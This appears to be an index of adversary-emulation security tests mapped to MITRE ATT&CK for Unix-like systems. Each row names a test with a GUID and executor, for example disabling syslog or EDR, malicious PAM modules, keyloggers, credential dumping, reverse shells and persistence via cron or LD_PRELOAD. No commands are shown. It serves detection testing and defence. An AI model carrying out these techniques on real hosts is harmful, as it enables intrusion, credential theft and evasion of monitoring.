113 defense-evasion T1562.003 Impair Defenses: Impair Command History Logging 8 Setting the HISTFILE environment variable b3dacb6c-a9e3-44ec-bf87-38db60c5cad1 bash
114 defense-evasion T1562.003 Impair Defenses: Impair Command History Logging 9 Setting the HISTFILE environment variable (freebsd) f7308845-6da8-468e-99f2-4271f2f5bb67 sh
115 defense-evasion T1562.003 Impair Defenses: Impair Command History Logging 10 Setting the HISTIGNORE environment variable f12acddb-7502-4ce6-a146-5b62c59592f1 bash
116 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 1 Disable syslog 4ce786f8-e601-44b5-bfae-9ebb15a7d1c8 sh
117 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 2 Disable syslog (freebsd) db9de996-441e-4ae0-947b-61b6871e2fdf sh
118 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 3 Disable Cb Response ae8943f7-0f8d-44de-962d-fbc2e2f03eb8 sh
119 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 4 Disable SELinux fc225f36-9279-4c39-b3f9-5141ab74f8d8 sh
120 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 5 Stop Crowdstrike Falcon on Linux 828a1278-81cc-4802-96ab-188bf29ca77d sh
121 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 39 Clear History 23b88394-091b-4968-a42d-fb8076992443 sh
122 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 40 Suspend History 94f6a1c9-aae7-46a4-9083-2bb1f5768ec4 sh
123 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 41 Reboot Linux Host via Kernel System Request 6d6d3154-1a52-4d1a-9d51-92ab8148b32e sh
124 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 42 Clear Pagging Cache f790927b-ea85-4a16-b7b2-7eb44176a510 sh
125 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 43 Disable Memory Swap e74e4c63-6fde-4ad2-9ee8-21c3a1733114 sh
126 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 47 Tamper with Defender ATP on Linux/MacOS 40074085-dbc8-492b-90a3-11bcfc52fda8 sh
127 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 50 ESXi - Disable Account Lockout Policy via PowerCLI 091a6290-cd29-41cb-81ea-b12f133c66cb powershell
128 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 59 Disable ASLR Via sysctl parameters - Linux ac333fe1-ce2b-400b-a117-538634427439 bash
129 defense-evasion T1027 Obfuscated Files or Information 1 Decode base64 Data into Script f45df6be-2e1e-4136-a384-8f18ab3826fb sh
130 defense-evasion T1036.003 Masquerading: Rename System Utilities 2 Masquerading as FreeBSD or Linux crond process. a315bfff-7a98-403b-b442-2ea1b255e556 sh
131 defense-evasion T1553.004 Subvert Trust Controls: Install Root Certificate 1 Install root CA on CentOS/RHEL 9c096ec4-fd42-419d-a762-d64cc950627e sh
132 defense-evasion T1553.004 Subvert Trust Controls: Install Root Certificate 2 Install root CA on FreeBSD f4568003-1438-44ab-a234-b3252ea7e7a3 sh
133 defense-evasion T1553.004 Subvert Trust Controls: Install Root Certificate 3 Install root CA on Debian/Ubuntu 53bcf8a0-1549-4b85-b919-010c56d724ff sh
134 defense-evasion T1027.004 Obfuscated Files or Information: Compile After Delivery 3 C compile d0377aa6-850a-42b2-95f0-de558d80be57 sh
135 defense-evasion T1027.004 Obfuscated Files or Information: Compile After Delivery 4 CC compile da97bb11-d6d0-4fc1-b445-e443d1346efe sh
136 defense-evasion T1027.004 Obfuscated Files or Information: Compile After Delivery 5 Go compile 78bd3fa7-773c-449e-a978-dc1f1500bc52 sh
137 defense-evasion T1070.004 Indicator Removal on Host: File Deletion 1 Delete a single file - FreeBSD/Linux/macOS 562d737f-2fc6-4b09-8c2a-7f8ff0828480 sh
138 defense-evasion T1070.004 Indicator Removal on Host: File Deletion 2 Delete an entire folder - FreeBSD/Linux/macOS a415f17e-ce8d-4ce2-a8b4-83b674e7017e sh
139 defense-evasion T1070.004 Indicator Removal on Host: File Deletion 3 Overwrite and delete a file with shred 039b4b10-2900-404b-b67f-4b6d49aa6499 sh
140 defense-evasion T1070.004 Indicator Removal on Host: File Deletion 8 Delete Filesystem - Linux f3aa95fe-4f10-4485-ad26-abf22a764c52 sh
141 defense-evasion T1027.002 Obfuscated Files or Information: Software Packing 1 Binary simply packed by UPX (linux) 11c46cd8-e471-450e-acb8-52a1216ae6a4 sh
142 defense-evasion T1027.002 Obfuscated Files or Information: Software Packing 2 Binary packed by UPX, with modified headers (linux) f06197f8-ff46-48c2-a0c6-afc1b50665e1 sh
143 defense-evasion T1036.006 Masquerading: Space after Filename 2 Space After Filename b95ce2eb-a093-4cd8-938d-5258cef656ea sh
144 defense-evasion T1564.001 Hide Artifacts: Hidden Files and Directories 1 Create a hidden file in a hidden directory 61a782e5-9a19-40b5-8ba4-69a4b9f3d7be sh
145 defense-evasion T1078.003 Valid Accounts: Local Accounts 8 Create local account (Linux) 02a91c34-8a5b-4bed-87af-501103eb5357 bash
146 defense-evasion T1078.003 Valid Accounts: Local Accounts 9 Reactivate a locked/expired account (Linux) d2b95631-62d7-45a3-aaef-0972cea97931 bash
147 defense-evasion T1078.003 Valid Accounts: Local Accounts 10 Reactivate a locked/expired account (FreeBSD) 09e3380a-fae5-4255-8b19-9950be0252cf sh
148 defense-evasion T1078.003 Valid Accounts: Local Accounts 11 Login as nobody (Linux) 3d2cd093-ee05-41bd-a802-59ee5c301b85 bash
149 defense-evasion T1078.003 Valid Accounts: Local Accounts 12 Login as nobody (freebsd) 16f6374f-7600-459a-9b16-6a88fd96d310 sh
150 persistence T1556.003 Modify Authentication Process: Pluggable Authentication Modules 1 Malicious PAM rule 4b9dde80-ae22-44b1-a82a-644bf009eb9c sh
151 persistence T1556.003 Modify Authentication Process: Pluggable Authentication Modules 2 Malicious PAM rule (freebsd) b17eacac-282d-4ca8-a240-46602cf863e3 sh
152 persistence T1556.003 Modify Authentication Process: Pluggable Authentication Modules 3 Malicious PAM module 65208808-3125-4a2e-8389-a0a00e9ab326 sh
153 persistence T1053.003 Scheduled Task/Job: Cron 1 Cron - Replace crontab with referenced file 435057fb-74b1-410e-9403-d81baf194f75 sh
154 persistence T1053.003 Scheduled Task/Job: Cron 2 Cron - Add script to all cron subfolders b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 bash
155 persistence T1053.003 Scheduled Task/Job: Cron 3 Cron - Add script to /etc/cron.d folder 078e69eb-d9fb-450e-b9d0-2e118217c846 sh
156 persistence T1053.003 Scheduled Task/Job: Cron 4 Cron - Add script to /var/spool/cron/crontabs/ folder 2d943c18-e74a-44bf-936f-25ade6cccab4 bash
157 persistence T1176 Browser Extensions 1 Chrome/Chromium (Developer Mode) 3ecd790d-2617-4abf-9a8c-4e8d47da9ee1 manual
158 persistence T1176 Browser Extensions 2 Chrome/Chromium (Chrome Web Store) 4c83940d-8ca5-4bb2-8100-f46dc914bc3f manual
159 persistence T1176 Browser Extensions 3 Firefox cb790029-17e6-4c43-b96f-002ce5f10938 manual
160 persistence T1546.005 Event Triggered Execution: Trap 1 Trap EXIT a74b2e07-5952-4c03-8b56-56274b076b61 sh
161 persistence T1546.005 Event Triggered Execution: Trap 2 Trap EXIT (freebsd) be1a5d70-6865-44aa-ab50-42244c9fd16f sh
162 persistence T1546.005 Event Triggered Execution: Trap 3 Trap SIGINT a547d1ba-1d7a-4cc5-a9cb-8d65e8809636 sh
163 persistence T1546.005 Event Triggered Execution: Trap 4 Trap SIGINT (freebsd) ade10242-1eac-43df-8412-be0d4c704ada sh
164 persistence T1574.006 Hijack Execution Flow: LD_PRELOAD 1 Shared Library Injection via /etc/ld.so.preload 39cb0e67-dd0d-4b74-a74b-c072db7ae991 bash
165 persistence T1574.006 Hijack Execution Flow: LD_PRELOAD 2 Shared Library Injection via LD_PRELOAD bc219ff7-789f-4d51-9142-ecae3397deae bash
166 persistence T1136.001 Create Account: Local Account 1 Create a user account on a Linux system 40d8eabd-e394-46f6-8785-b9bfa1d011d2 bash
167 persistence T1136.001 Create Account: Local Account 2 Create a user account on a FreeBSD system a39ee1bc-b8c1-4331-8e5f-1859eb408518 sh
168 persistence T1136.001 Create Account: Local Account 6 Create a new user in Linux with `root` UID and GID. a1040a30-d28b-4eda-bd99-bb2861a4616c bash
169 persistence T1136.001 Create Account: Local Account 7 Create a new user in FreeBSD with `root` GID. d141afeb-d2bc-4934-8dd5-b7dba0f9f67a sh
170 persistence T1098.004 SSH Authorized Keys 1 Modify SSH Authorized Keys 342cc723-127c-4d3a-8292-9c0c6b4ecadc sh
171 persistence T1136.002 Create Account: Domain Account 4 Active Directory Create Admin Account 562aa072-524e-459a-ba2b-91f1afccf5ab sh
172 persistence T1136.002 Create Account: Domain Account 5 Active Directory Create User Account (Non-elevated) 8c992cb3-a46e-4fd5-b005-b1bab185af31 sh
173 persistence T1547.006 Boot or Logon Autostart Execution: Kernel Modules and Extensions 1 Linux - Load Kernel Module via insmod 687dcb93-9656-4853-9c36-9977315e9d23 bash
174 persistence T1053.006 Scheduled Task/Job: Systemd Timers 1 Create Systemd Service and Timer f4983098-bb13-44fb-9b2c-46149961807b bash
175 persistence T1053.006 Scheduled Task/Job: Systemd Timers 2 Create a user level transient systemd service and timer 3de33f5b-62e5-4e63-a2a0-6fd8808c80ec sh
176 persistence T1053.006 Scheduled Task/Job: Systemd Timers 3 Create a system level transient systemd service and timer d3eda496-1fc0-49e9-aff5-3bec5da9fa22 sh
177 persistence T1546.004 Event Triggered Execution: .bash_profile .bashrc and .shrc 1 Add command to .bash_profile 94500ae1-7e31-47e3-886b-c328da46872f sh
178 persistence T1546.004 Event Triggered Execution: .bash_profile .bashrc and .shrc 2 Add command to .bashrc 0a898315-4cfa-4007-bafe-33a4646d115f sh
179 persistence T1546.004 Event Triggered Execution: .bash_profile .bashrc and .shrc 3 Add command to .shrc 41502021-591a-4649-8b6e-83c9192aff53 sh
180 persistence T1546.004 Event Triggered Execution: .bash_profile .bashrc and .shrc 4 Append to the system shell profile 694b3cc8-6a78-4d35-9e74-0123d009e94b sh
181 persistence T1546.004 Event Triggered Execution: .bash_profile .bashrc and .shrc 5 Append commands user shell profile bbdb06bc-bab6-4f5b-8232-ba3fbed51d77 sh
182 persistence T1546.004 Event Triggered Execution: .bash_profile .bashrc and .shrc 6 System shell profile scripts 8fe2ccfd-f079-4c03-b1a9-bd9b362b67d4 sh
183 persistence T1546.004 Event Triggered Execution: .bash_profile .bashrc and .shrc 7 Create/Append to .bash_logout 37ad2f24-7c53-4a50-92da-427a4ad13f58 bash
184 persistence T1037.004 Boot or Logon Initialization Scripts: Rc.common 2 rc.common c33f3d80-5f04-419b-a13a-854d1cbdbf3a bash
185 persistence T1037.004 Boot or Logon Initialization Scripts: Rc.common 3 rc.local 126f71af-e1c9-405c-94ef-26a47b16c102 sh
186 persistence T1543.002 Create or Modify System Process: SysV/Systemd Service 1 Create Systemd Service d9e4f24f-aa67-4c6e-bcbf-85622b697a7c bash
187 persistence T1543.002 Create or Modify System Process: SysV/Systemd Service 2 Create SysV Service 760fe8d2-79d9-494f-905e-a239a3df86f6 sh
188 persistence T1543.002 Create or Modify System Process: SysV/Systemd Service 3 Create Systemd Service file, Enable the service , Modify and Reload the service. c35ac4a8-19de-43af-b9f8-755da7e89c89 bash
189 persistence T1053.002 Scheduled Task/Job: At 2 At - Schedule a job 7266d898-ac82-4ec0-97c7-436075d0d08e sh
190 persistence T1078.003 Valid Accounts: Local Accounts 8 Create local account (Linux) 02a91c34-8a5b-4bed-87af-501103eb5357 bash
191 persistence T1078.003 Valid Accounts: Local Accounts 9 Reactivate a locked/expired account (Linux) d2b95631-62d7-45a3-aaef-0972cea97931 bash
192 persistence T1078.003 Valid Accounts: Local Accounts 10 Reactivate a locked/expired account (FreeBSD) 09e3380a-fae5-4255-8b19-9950be0252cf sh
193 persistence T1078.003 Valid Accounts: Local Accounts 11 Login as nobody (Linux) 3d2cd093-ee05-41bd-a802-59ee5c301b85 bash
194 persistence T1078.003 Valid Accounts: Local Accounts 12 Login as nobody (freebsd) 16f6374f-7600-459a-9b16-6a88fd96d310 sh
195 command-and-control T1132.001 Data Encoding: Standard Encoding 1 Base64 Encoded data. 1164f70f-9a88-4dff-b9ff-dc70e7bf0c25 sh
196 command-and-control T1132.001 Data Encoding: Standard Encoding 2 Base64 Encoded data (freebsd) 2d97c626-7652-449e-a986-b02d9051c298 sh
197 command-and-control T1572 Protocol Tunneling 5 Microsoft Dev tunnels (Linux/macOS) 9f94a112-1ce2-464d-a63b-83c1f465f801 bash
198 command-and-control T1572 Protocol Tunneling 6 VSCode tunnels (Linux/macOS) b877943f-0377-44f4-8477-f79db7f07c4d sh
199 command-and-control T1572 Protocol Tunneling 7 Cloudflare tunnels (Linux/macOS) 228c336a-2f79-4043-8aef-bfa453a611d5 sh
200 command-and-control T1090.003 Proxy: Multi-hop Proxy 3 Tor Proxy Usage - Debian/Ubuntu/FreeBSD 5ff9d047-6e9c-4357-b39b-5cf89d9b59c7 sh
201 command-and-control T1571 Non-Standard Port 2 Testing usage of uncommonly used port 5db21e1d-dd9c-4a50-b885-b1e748912767 sh
202 command-and-control T1095 Non-Application Layer Protocol 4 Linux ICMP Reverse Shell using icmp-cnc 8e139e1f-1f3a-4be7-901d-afae9738c064 manual
203 command-and-control T1071.001 Application Layer Protocol: Web Protocols 3 Malicious User Agents - Nix 2d7c471a-e887-4b78-b0dc-b0df1f2e0658 sh
204 command-and-control T1105 Ingress Tool Transfer 1 rsync remote file copy (push) 0fc6e977-cb12-44f6-b263-2824ba917409 sh
205 command-and-control T1105 Ingress Tool Transfer 2 rsync remote file copy (pull) 3180f7d5-52c0-4493-9ea0-e3431a84773f sh
206 command-and-control T1105 Ingress Tool Transfer 3 scp remote file copy (push) 83a49600-222b-4866-80a0-37736ad29344 sh
207 command-and-control T1105 Ingress Tool Transfer 4 scp remote file copy (pull) b9d22b9a-9778-4426-abf0-568ea64e9c33 sh
208 command-and-control T1105 Ingress Tool Transfer 5 sftp remote file copy (push) f564c297-7978-4aa9-b37a-d90477feea4e bash
209 command-and-control T1105 Ingress Tool Transfer 6 sftp remote file copy (pull) 0139dba1-f391-405e-a4f5-f3989f2c88ef sh
210 command-and-control T1105 Ingress Tool Transfer 14 whois file download c99a829f-0bb8-4187-b2c6-d47d1df74cab sh
211 command-and-control T1105 Ingress Tool Transfer 27 Linux Download File and Run bdc373c5-e9cf-4563-8a7b-a9ba720a90f3 sh
212 command-and-control T1001.002 Data Obfuscation via Steganography 3 Execute Embedded Script in Image via Steganography 4ff61684-ad91-405c-9fbc-048354ff1d07 sh
213 command-and-control T1090.001 Proxy: Internal Proxy 1 Connection Proxy 0ac21132-4485-4212-a681-349e8a6637cd sh
214 collection T1560.001 Archive Collected Data: Archive via Utility 5 Data Compressed - nix - zip c51cec55-28dd-4ad2-9461-1eacbc82c3a0 bash
215 collection T1560.001 Archive Collected Data: Archive via Utility 6 Data Compressed - nix - gzip Single File cde3c2af-3485-49eb-9c1f-0ed60e9cc0af sh
216 collection T1560.001 Archive Collected Data: Archive via Utility 7 Data Compressed - nix - tar Folder or File 7af2b51e-ad1c-498c-aca8-d3290c19535a sh
217 collection T1560.001 Archive Collected Data: Archive via Utility 8 Data Encrypted with zip and gpg symmetric 0286eb44-e7ce-41a0-b109-3da516e05a5f sh
218 collection T1560.001 Archive Collected Data: Archive via Utility 9 Encrypts collected data with AES-256 and Base64 a743e3a6-e8b2-4a30-abe7-ca85d201b5d3 bash
219 collection T1113 Screen Capture 3 X Windows Capture 8206dd0c-faf6-4d74-ba13-7fbe13dce6ac bash
220 collection T1113 Screen Capture 4 X Windows Capture (freebsd) 562f3bc2-74e8-46c5-95c7-0e01f9ccc65c sh
221 collection T1113 Screen Capture 5 Capture Linux Desktop using Import Tool 9cd1cccb-91e4-4550-9139-e20a586fcea1 bash
222 collection T1113 Screen Capture 6 Capture Linux Desktop using Import Tool (freebsd) 18397d87-38aa-4443-a098-8a48a8ca5d8d sh
223 collection T1056.001 Input Capture: Keylogging 2 Living off the land Terminal Input Capture on Linux with pam.d 9c6bdb34-a89f-4b90-acb1-5970614c711b sh
224 collection T1056.001 Input Capture: Keylogging 3 Logging bash history to syslog 0e59d59d-3265-4d35-bebd-bf5c1ec40db5 sh
225 collection T1056.001 Input Capture: Keylogging 4 Logging sh history to syslog/messages b04284dc-3bd9-4840-8d21-61b8d31c99f2 sh
226 collection T1056.001 Input Capture: Keylogging 5 Bash session based keylogger 7f85a946-a0ea-48aa-b6ac-8ff539278258 bash
227 collection T1056.001 Input Capture: Keylogging 6 SSHD PAM keylogger 81d7d2ad-d644-4b6a-bea7-28ffe43becca sh
228 collection T1056.001 Input Capture: Keylogging 7 Auditd keylogger a668edb9-334e-48eb-8c2e-5413a40867af sh
229 collection T1074.001 Data Staged: Local Data Staging 2 Stage data from Discovery.sh 39ce0303-ae16-4b9e-bb5b-4f53e8262066 sh
230 collection T1115 Clipboard Data 5 Add or copy content to clipboard with xClip ee363e53-b083-4230-aff3-f8d955f2d5bb sh
231 collection T1005 Data from Local System 2 Find and dump sqlite databases (Linux) 00cbb875-7ae4-4cf1-b638-e543fd825300 bash
232 collection T1560.002 Archive Collected Data: Archive via Library 1 Compressing data using GZip in Python (FreeBSD/Linux) 391f5298-b12d-4636-8482-35d9c17d53a8 sh
233 collection T1560.002 Archive Collected Data: Archive via Library 2 Compressing data using bz2 in Python (FreeBSD/Linux) c75612b2-9de0-4d7c-879c-10d7b077072d sh
234 collection T1560.002 Archive Collected Data: Archive via Library 3 Compressing data using zipfile in Python (FreeBSD/Linux) 001a042b-859f-44d9-bf81-fd1c4e2200b0 sh
235 collection T1560.002 Archive Collected Data: Archive via Library 4 Compressing data using tarfile in Python (FreeBSD/Linux) e86f1b4b-fcc1-4a2a-ae10-b49da01458db sh
236 privilege-escalation T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 Sudo usage 150c3a08-ee6e-48a6-aeaf-3659d24ceb4e sh
237 privilege-escalation T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching 2 Sudo usage (freebsd) 2bf9a018-4664-438a-b435-cc6f8c6f71b1 sh
238 privilege-escalation T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching 3 Unlimited sudo cache timeout a7b17659-dd5e-46f7-b7d1-e6792c91d0bc sh
239 privilege-escalation T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching 4 Unlimited sudo cache timeout (freebsd) a83ad6e8-6f24-4d7f-8f44-75f8ab742991 sh
240 privilege-escalation T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching 5 Disable tty_tickets for sudo caching 91a60b03-fb75-4d24-a42e-2eb8956e8de1 sh
241 privilege-escalation T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching 6 Disable tty_tickets for sudo caching (freebsd) 4df6a0fe-2bdd-4be8-8618-a6a19654a57a sh
242 privilege-escalation T1053.003 Scheduled Task/Job: Cron 1 Cron - Replace crontab with referenced file 435057fb-74b1-410e-9403-d81baf194f75 sh
243 privilege-escalation T1053.003 Scheduled Task/Job: Cron 2 Cron - Add script to all cron subfolders b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 bash
244 privilege-escalation T1053.003 Scheduled Task/Job: Cron 3 Cron - Add script to /etc/cron.d folder 078e69eb-d9fb-450e-b9d0-2e118217c846 sh
245 privilege-escalation T1053.003 Scheduled Task/Job: Cron 4 Cron - Add script to /var/spool/cron/crontabs/ folder 2d943c18-e74a-44bf-936f-25ade6cccab4 bash
246 privilege-escalation T1546.005 Event Triggered Execution: Trap 1 Trap EXIT a74b2e07-5952-4c03-8b56-56274b076b61 sh
247 privilege-escalation T1546.005 Event Triggered Execution: Trap 2 Trap EXIT (freebsd) be1a5d70-6865-44aa-ab50-42244c9fd16f sh
248 privilege-escalation T1546.005 Event Triggered Execution: Trap 3 Trap SIGINT a547d1ba-1d7a-4cc5-a9cb-8d65e8809636 sh
249 privilege-escalation T1546.005 Event Triggered Execution: Trap 4 Trap SIGINT (freebsd) ade10242-1eac-43df-8412-be0d4c704ada sh
250 privilege-escalation T1574.006 Hijack Execution Flow: LD_PRELOAD 1 Shared Library Injection via /etc/ld.so.preload 39cb0e67-dd0d-4b74-a74b-c072db7ae991 bash
251 privilege-escalation T1574.006 Hijack Execution Flow: LD_PRELOAD 2 Shared Library Injection via LD_PRELOAD bc219ff7-789f-4d51-9142-ecae3397deae bash
252 privilege-escalation T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 1 Make and modify binary from C source 896dfe97-ae43-4101-8e96-9a7996555d80 sh
253 privilege-escalation T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 2 Make and modify binary from C source (freebsd) dd580455-d84b-481b-b8b0-ac96f3b1dc4c sh
254 privilege-escalation T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 3 Set a SetUID flag on file 759055b3-3885-4582-a8ec-c00c9d64dd79 sh
255 privilege-escalation T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 4 Set a SetUID flag on file (freebsd) 9be9b827-ff47-4e1b-bef8-217db6fb7283 sh
256 privilege-escalation T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 5 Set a SetGID flag on file db55f666-7cba-46c6-9fe6-205a05c3242c sh
257 privilege-escalation T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 6 Set a SetGID flag on file (freebsd) 1f73af33-62a8-4bf1-bd10-3bea931f2c0d sh
258 privilege-escalation T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 7 Make and modify capabilities of a binary db53959c-207d-4000-9e7a-cd8eb417e072 sh
259 privilege-escalation T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 8 Provide the SetUID capability to a file 1ac3272f-9bcf-443a-9888-4b1d3de785c1 sh
260 privilege-escalation T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 9 Do reconnaissance for files that have the setuid bit set 8e36da01-cd29-45fd-be72-8a0fcaad4481 sh
261 privilege-escalation T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 10 Do reconnaissance for files that have the setgid bit set 3fb46e17-f337-4c14-9f9a-a471946533e2 sh
262 privilege-escalation T1098.004 SSH Authorized Keys 1 Modify SSH Authorized Keys 342cc723-127c-4d3a-8292-9c0c6b4ecadc sh
263 privilege-escalation T1547.006 Boot or Logon Autostart Execution: Kernel Modules and Extensions 1 Linux - Load Kernel Module via insmod 687dcb93-9656-4853-9c36-9977315e9d23 bash
264 privilege-escalation T1053.006 Scheduled Task/Job: Systemd Timers 1 Create Systemd Service and Timer f4983098-bb13-44fb-9b2c-46149961807b bash
265 privilege-escalation T1053.006 Scheduled Task/Job: Systemd Timers 2 Create a user level transient systemd service and timer 3de33f5b-62e5-4e63-a2a0-6fd8808c80ec sh
266 privilege-escalation T1053.006 Scheduled Task/Job: Systemd Timers 3 Create a system level transient systemd service and timer d3eda496-1fc0-49e9-aff5-3bec5da9fa22 sh
267 privilege-escalation T1546.004 Event Triggered Execution: .bash_profile .bashrc and .shrc 1 Add command to .bash_profile 94500ae1-7e31-47e3-886b-c328da46872f sh
268 privilege-escalation T1546.004 Event Triggered Execution: .bash_profile .bashrc and .shrc 2 Add command to .bashrc 0a898315-4cfa-4007-bafe-33a4646d115f sh
269 privilege-escalation T1546.004 Event Triggered Execution: .bash_profile .bashrc and .shrc 3 Add command to .shrc 41502021-591a-4649-8b6e-83c9192aff53 sh
270 privilege-escalation T1546.004 Event Triggered Execution: .bash_profile .bashrc and .shrc 4 Append to the system shell profile 694b3cc8-6a78-4d35-9e74-0123d009e94b sh
271 privilege-escalation T1546.004 Event Triggered Execution: .bash_profile .bashrc and .shrc 5 Append commands user shell profile bbdb06bc-bab6-4f5b-8232-ba3fbed51d77 sh
272 privilege-escalation T1546.004 Event Triggered Execution: .bash_profile .bashrc and .shrc 6 System shell profile scripts 8fe2ccfd-f079-4c03-b1a9-bd9b362b67d4 sh
273 privilege-escalation T1546.004 Event Triggered Execution: .bash_profile .bashrc and .shrc 7 Create/Append to .bash_logout 37ad2f24-7c53-4a50-92da-427a4ad13f58 bash
274 privilege-escalation T1037.004 Boot or Logon Initialization Scripts: Rc.common 2 rc.common c33f3d80-5f04-419b-a13a-854d1cbdbf3a bash
275 privilege-escalation T1037.004 Boot or Logon Initialization Scripts: Rc.common 3 rc.local 126f71af-e1c9-405c-94ef-26a47b16c102 sh
276 privilege-escalation T1543.002 Create or Modify System Process: SysV/Systemd Service 1 Create Systemd Service d9e4f24f-aa67-4c6e-bcbf-85622b697a7c bash
277 privilege-escalation T1543.002 Create or Modify System Process: SysV/Systemd Service 2 Create SysV Service 760fe8d2-79d9-494f-905e-a239a3df86f6 sh
278 privilege-escalation T1543.002 Create or Modify System Process: SysV/Systemd Service 3 Create Systemd Service file, Enable the service , Modify and Reload the service. c35ac4a8-19de-43af-b9f8-755da7e89c89 bash
279 privilege-escalation T1053.002 Scheduled Task/Job: At 2 At - Schedule a job 7266d898-ac82-4ec0-97c7-436075d0d08e sh
280 privilege-escalation T1078.003 Valid Accounts: Local Accounts 8 Create local account (Linux) 02a91c34-8a5b-4bed-87af-501103eb5357 bash
281 privilege-escalation T1078.003 Valid Accounts: Local Accounts 9 Reactivate a locked/expired account (Linux) d2b95631-62d7-45a3-aaef-0972cea97931 bash
282 privilege-escalation T1078.003 Valid Accounts: Local Accounts 10 Reactivate a locked/expired account (FreeBSD) 09e3380a-fae5-4255-8b19-9950be0252cf sh
283 privilege-escalation T1078.003 Valid Accounts: Local Accounts 11 Login as nobody (Linux) 3d2cd093-ee05-41bd-a802-59ee5c301b85 bash
284 privilege-escalation T1078.003 Valid Accounts: Local Accounts 12 Login as nobody (freebsd) 16f6374f-7600-459a-9b16-6a88fd96d310 sh
285 credential-access T1556.003 Modify Authentication Process: Pluggable Authentication Modules 1 Malicious PAM rule 4b9dde80-ae22-44b1-a82a-644bf009eb9c sh
286 credential-access T1556.003 Modify Authentication Process: Pluggable Authentication Modules 2 Malicious PAM rule (freebsd) b17eacac-282d-4ca8-a240-46602cf863e3 sh
287 credential-access T1556.003 Modify Authentication Process: Pluggable Authentication Modules 3 Malicious PAM module 65208808-3125-4a2e-8389-a0a00e9ab326 sh
288 credential-access T1056.001 Input Capture: Keylogging 2 Living off the land Terminal Input Capture on Linux with pam.d 9c6bdb34-a89f-4b90-acb1-5970614c711b sh
289 credential-access T1056.001 Input Capture: Keylogging 3 Logging bash history to syslog 0e59d59d-3265-4d35-bebd-bf5c1ec40db5 sh
290 credential-access T1056.001 Input Capture: Keylogging 4 Logging sh history to syslog/messages b04284dc-3bd9-4840-8d21-61b8d31c99f2 sh
291 credential-access T1056.001 Input Capture: Keylogging 5 Bash session based keylogger 7f85a946-a0ea-48aa-b6ac-8ff539278258 bash
292 credential-access T1056.001 Input Capture: Keylogging 6 SSHD PAM keylogger 81d7d2ad-d644-4b6a-bea7-28ffe43becca sh
293 credential-access T1056.001 Input Capture: Keylogging 7 Auditd keylogger a668edb9-334e-48eb-8c2e-5413a40867af sh
294 credential-access T1110.001 Brute Force: Password Guessing 5 SUDO Brute Force - Debian ba1bf0b6-f32b-4db0-b7cc-d78cacc76700 bash
295 credential-access T1110.001 Brute Force: Password Guessing 6 SUDO Brute Force - Redhat 4097bc00-5eeb-4d56-aaf9-287d60351d95 bash
296 credential-access T1110.001 Brute Force: Password Guessing 7 SUDO Brute Force - FreeBSD abcde488-e083-4ee7-bc85-a5684edd7541 bash
297 credential-access T1003.007 OS Credential Dumping: Proc Filesystem 1 Dump individual process memory with sh (Local) 7e91138a-8e74-456d-a007-973d67a0bb80 sh
298 credential-access T1003.007 OS Credential Dumping: Proc Filesystem 2 Dump individual process memory with sh on FreeBSD (Local) fa37b633-e097-4415-b2b8-c5bf4c86e423 sh
299 credential-access T1003.007 OS Credential Dumping: Proc Filesystem 3 Dump individual process memory with Python (Local) 437b2003-a20d-4ed8-834c-4964f24eec63 sh
300 credential-access T1003.007 OS Credential Dumping: Proc Filesystem 4 Capture Passwords with MimiPenguin a27418de-bdce-4ebd-b655-38f04842bf0c bash
301 credential-access T1040 Network Sniffing 1 Packet Capture Linux using tshark or tcpdump 7fe741f7-b265-4951-a7c7-320889083b3e bash
302 credential-access T1040 Network Sniffing 2 Packet Capture FreeBSD using tshark or tcpdump c93f2492-9ebe-44b5-8b45-36574cccfe67 sh
303 credential-access T1040 Network Sniffing 10 Packet Capture FreeBSD using /dev/bpfN with sudo e2028771-1bfb-48f5-b5e6-e50ee0942a14 sh
304 credential-access T1040 Network Sniffing 11 Filtered Packet Capture FreeBSD using /dev/bpfN with sudo a3a0d4c9-c068-4563-a08d-583bd05b884c sh
305 credential-access T1040 Network Sniffing 12 Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo 10c710c9-9104-4d5f-8829-5b65391e2a29 bash
306 credential-access T1040 Network Sniffing 13 Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo 7a0895f0-84c1-4adf-8491-a21510b1d4c1 bash
307 credential-access T1040 Network Sniffing 14 Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo 515575ab-d213-42b1-aa64-ef6a2dd4641b bash
308 credential-access T1040 Network Sniffing 15 Packet Capture Linux socket AF_PACKET,SOCK_RAW with BPF filter for UDP with sudo b1cbdf8b-6078-48f5-a890-11ea19d7f8e9 bash
309 credential-access T1552 Unsecured Credentials 1 AWS - Retrieve EC2 Password Data using stratus a21118de-b11e-4ebd-b655-42f11142df0c sh
